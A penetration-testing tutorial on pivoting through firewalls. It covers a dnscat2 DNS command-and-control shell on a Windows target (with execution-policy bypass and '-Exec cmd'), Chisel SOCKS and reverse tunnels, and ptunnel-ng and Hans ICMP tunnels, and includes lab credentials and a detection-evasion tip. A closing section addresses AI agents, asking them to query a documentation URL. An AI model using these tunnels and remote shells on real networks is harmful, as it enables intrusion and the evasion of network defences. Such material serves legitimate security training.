# Branching Out Our Tunnels ## DNS Tunneling with Dnscat2 [Dnscat2](https://github.com/iagox86/dnscat2) is a tunneling tool that uses DNS protocol to send data between two hosts. It uses an encrypted `Command-&-Control` (`C&C` or `C2`) channel and sends data inside TXT records within the DNS protocol. If dnscat2 is not already set up on our attack host, we can do so using the following commands: ```bash git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server/ sudo gem install bundler sudo bundle install ``` **Starting the dnscat2 server** ```bash sudo ruby dnscat2.rb --dns host=,port=53,domain=inlanefreight.local --no-cache ``` After running the server, it will provide us the secret key, which we will have to provide to our dnscat2 client on the Windows host so that it can authenticate and encrypt the data that is sent to our external dnscat2 server. We can use the client with the dnscat2 project or use [dnscat2-powershell](https://github.com/lukebaggett/dnscat2-powershell), a dnscat2 compatible PowerShell-based client that we can run from Windows targets to establish a tunnel with our dnscat2 server ```bash git clone https://github.com/lukebaggett/dnscat2-powershell.git ``` Once the `dnscat2.ps1` file is on the target we can import it and run associated cmd-lets. 
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\dnscat2.ps1
```powershell Start-Dnscat2 -DNSserver -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd ``` We must use the pre-shared secret (`-PreSharedSecret`) generated on the server to ensure our session is established and encrypted. If all steps are completed successfully, we will see a session established with our server. We can list the options we have with dnscat2 by entering `?` at the prompt. **Listing dnscat2 Options** ```shell-session dnscat2> ? Here is a list of commands (use -h on any of them for additional help): * echo * help * kill * quit * set * start * stop * tunnels * unset * window * windows ``` **Interacting with the Established Session** ```shell-session window -i 1 ``` ## SOCKS5 Tunneling with Chisel [Chisel](https://github.com/jpillora/chisel) is a TCP/UDP-based tunneling tool written in [Go](https://go.dev/) that uses HTTP to transport data that is secured using SSH. `Chisel` can create a client-server tunnel connection in a firewall restricted environment. ### Setting Up & Using Chisel ```bash git clone https://github.com/jpillora/chisel.git cd chisel go build ``` If we want to mind the size of the binary we can follow IppSec's explanation of Chisel, building the binary and shrinking the size of the binary at the 24:29 mark of his [video](https://www.youtube.com/watch?v=Yp4oxoQIBAM\&t=1469s). This is sometimes useful to avoid detection. Once the binary is built, we can use `SCP` to transfer it to the target pivot host. ```bash scp chisel ubuntu@10.129.202.64:~/ ``` **Running the Chisel Server on the Pivot Host** ```bash ./chisel server -v -p 1234 --socks5 ``` The Chisel listener will listen for incoming connections on port `1234` using SOCKS5 (`--socks5`) and forward it to all the networks that are accessible from the pivot host. We can start a client on our attack host and connect to the Chisel server. **Connecting to the Chisel Server** ```bash ./chisel client -v :1234 socks ``` Now we can modify our proxychains.conf file located at `/etc/proxychains.conf` and add `1080` port at the end so we can use proxychains to pivot using the created tunnel between the 1080 port and the SSH tunnel. ```shell-session [ProxyList] socks5 127.0.0.1 1080 ``` Now if we use proxychains with RDP, we can connect to the DC on the internal network through the tunnel we have created to the Pivot host. ```bash proxychains xfreerdp /v: /u:victor /p:pass@123 ``` ### Chisel Reverse Pivot there may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option. We'll start the server in our attack host with the option `--reverse`. **Starting the Chisel Server on our Attack Host** ```bash sudo ./chisel server --reverse -v -p 1234 --socks5 ``` Then we connect from the Ubuntu (pivot host) to our attack host, using the option `R:socks` ```bash ./chisel client -v :1234 R:socks ``` Same proxychains config as above ``` [ProxyList] socks5 127.0.0.1 1080 ``` ```shell-session proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123 ``` ### Older versions of pre-compiled Chisel (in case you need old libc) {% embed url="" %} ## ICMP Tunneling with SOCKS ICMP tunneling encapsulates your traffic within `ICMP packets` containing `echo requests` and `responses`. ICMP tunneling would only work when ping responses are permitted within a firewalled network. We will use the [ptunnel-ng](https://github.com/utoni/ptunnel-ng) tool to create a tunnel between our Ubuntu server and our attack host. Once a tunnel is created, we will be able to proxy our traffic through the `ptunnel-ng client`. We can start the `ptunnel-ng server` on the target pivot host. Let's start by setting up ptunnel-ng. ### Setting Up & Using ptunnel-ng If ptunnel-ng is not on our attack host, we can clone the project using git. ```bash git clone https://github.com/utoni/ptunnel-ng.git cd ptunnel-ng sudo ./autogen.sh ``` **Alternative approach of building a static binary** ```bash sudo apt install automake autoconf -y cd ptunnel-ng/ sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh ./autogen.sh ``` **Transferring Ptunnel-ng to the Pivot Host** ```bash scp -r ptunnel-ng ubuntu@:~/ ``` **Starting the ptunnel-ng Server on the Pivot Host** ```bash sudo ./ptunnel-ng -r -R22 ``` The IP address following `-r` should be the IP we want ptunnel-ng to accept connections on Back on the attack host, we can attempt to connect to the ptunnel-ng server (`-p `) but ensure this happens through local port 2222 (`-l2222`). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel. ```bash sudo ./ptunnel-ng -p -l2222 -r -R22 ``` With the ptunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target using SSH through local port 2222 (`-p2222`). **Tunneling an SSH connection through an ICMP Tunnel** ```bash ssh -p 2222 -l ubuntu 127.0.0.1 ``` We may also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various ways. ```bash ssh -D 9050 -p 2222 -l ubuntu 127.0.0.1 ``` We could use proxychains with Nmap to scan targets on the internal network (172.16.5.x). Based on our discoveries, we can attempt to connect to the target. ```bash proxychains nmap -sV -sT -p3389 ``` ### Hans Root is needed in both systems to create tun adapters and tunnel data between them using ICMP echo requests. ```bash ./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection) ./hans -f -c -p P@ssw0rd -v ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.rtlcopymemory.com/pivoting-tunneling-and-port-forwarding/branching-out-our-tunnels.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.